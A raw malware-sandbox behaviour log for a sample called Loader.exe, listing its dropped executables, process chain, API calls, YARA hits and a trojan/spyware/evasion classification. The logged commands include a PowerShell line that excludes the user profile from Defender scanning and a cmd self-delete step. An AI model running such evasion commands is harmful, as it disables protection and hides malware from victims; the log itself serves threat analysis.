                    Source: unknown; HTTPS traffic detected: 5.2.81.126:443 -> 192.168.2.5:49736 version: TLS 1.2
                    Source: C:\Users\user\Desktop\Loader.exe; Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
                    Source: C:\Users\user\Desktop\Loader.exe; Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
                    Source: Yara match; File source: 16.3.svchost.exe.4af0000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 16.3.svchost.exe.4d10000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 16.3.svchost.exe.4d10000.7.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000010.00000003.2844637112.0000000004D10000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000010.00000003.2844199525.0000000004AF0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe; File created: C:\Users\user\AppData\Local\Temp\TmpE988.tmp
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe; File created: C:\Users\user\AppData\Local\Temp\TmpE968.tmp
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe; Code function: 13_2_057D1D98 NtResumeThread
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe; Code function: 13_2_0571F6D8 NtProtectVirtualMemory
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe; Code function: 13_2_0571F6D0 NtProtectVirtualMemory
                    Source: C:\Users\user\Desktop\Loader.exe; Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exe; Code function: 12_2_00007FF7600A2C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exe; Code function: 12_2_00007FF7600A1C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx
                    Source: C:\Users\user\Desktop\Loader.exe; Code function: String function: 004062CF appears 58 times
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exe; Code function: String function: 00406E10 appears 37 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 348
                    Source: Loader.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: Loader.exe; Static PE information: Section: .reloc ZLIB complexity 0.995849609375
                    Source: classification engine; Classification label: mal100.phis.troj.spyw.evad.winEXE@58/347@12/13
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exe; Code function: 2_2_00401ED0 GetLastError,puts,ShellExecuteA,printf,fclose,MessageBoxA,FormatMessageA,strlen,strcat,LocalFree,fprintf,fprintf,fprintf
                    Source: C:\Users\user\Desktop\Loader.exe; Code function: 0_2_004024FB CoCreateInstance
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exe; Code function: 2_2_00404740 FindResourceExA,LoadResource,LockResource,fprintf,FindResourceExA,LoadResource,LockResource,fprintf,strchr,strlen,strcpy,FindResourceExA,LoadResource,LockResource,fprintf,strchr,strlen,strcpy,strncpy,strlen,strcat,strncpy,strlen,strcat,FindResourceExA,LoadResource,LockResource,atoi,SetLastError,SetLastError,SetLastError,strcpy,fprintf,FindResourceExA,LoadResource,LockResource,atoi,strcpy,fprintf,fprintf,SetLastError,SetLastError,fprintf
                    Source: C:\Users\user\Desktop\Loader.exe; File created: C:\Users\user\AppData\Local\CampaignHardwareLauncher
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe; Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3992:120:WilError_03
                    Source: C:\Windows\SysWOW64\svchost.exe; Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-c50d30d3-8556-339baa-d1c50f81ff32}
                    Source: C:\Users\user\Desktop\Loader.exe; File created: C:\Users\user\AppData\Local\Temp\nsbB4EF.tmp
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe; Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\8b774b6fbd21273c42f034e15d863942.bat
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe; Process created: C:\Windows\SysWOW64\explorer.exe
                    Source: unknown; Process created: C:\Windows\explorer.exe
                    Source: Loader.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\SysWOW64\svchost.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Loader.exe File read: C:\Users\desktop.ini
                    Source: C:\Users\user\Desktop\Loader.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: Loader.exe Virustotal: Detection: 27%
                    Source: Loader.exe ReversingLabs: Detection: 23%
                    Source: C:\Users\user\Desktop\Loader.exe File read: C:\Users\user\Desktop\Loader.exe
                    Source: unknown Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
                    Source: C:\Users\user\Desktop\Loader.exe Process created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exe C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exe
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exe Process created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe "C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "ddfrt658\.;ddfrt658\..;ddfrt658\asm-all.jar;ddfrt658\dn-compiled-module.jar;ddfrt658\dn-php-sdk.jar;ddfrt658\gson.jar;ddfrt658\jfoenix.jar;ddfrt658\jphp-app-framework.jar;ddfrt658\jphp-core.jar;ddfrt658\jphp-desktop-ext.jar;ddfrt658\jphp-gui-ext.jar;ddfrt658\jphp-gui-jfoenix-ext.jar;ddfrt658\jphp-json-ext.jar;ddfrt658\jphp-jsoup-ext.jar;ddfrt658\jphp-runtime.jar;ddfrt658\jphp-xml-ext.jar;ddfrt658\jphp-zend-ext.jar;ddfrt658\jphp-zip-ext.jar;ddfrt658\jsoup.jar;ddfrt658\slf4j-api.jar;ddfrt658\slf4j-simple.jar;ddfrt658\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\8b774b6fbd21273c42f034e15d863942.bat
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe Process created: C:\Windows\SysWOW64\explorer.exe explorer C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exe
                    Source: unknown Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                    Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exe "C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exe"
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exe Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 348
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exe Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C timeout 1 && del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe"
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
                    Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                    Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr34F8.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/446d3de0/c462449b"
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2864 --field-trial-handle=2760,i,8911409876451875060,10497288921933201454,262144 /prefetch:8
                    Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr417C.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/446d3de0/c7af6c55"
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3232 --field-trial-handle=2952,i,15376106981167102888,3693365573348808806,262144 /prefetch:3
                    Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: dataexchange.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: dcomp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ninput.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: actxprxy.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ninput.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: actxprxy.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: smartscreenps.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: pcacli.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeSection loaded: version.dllJump to behavior
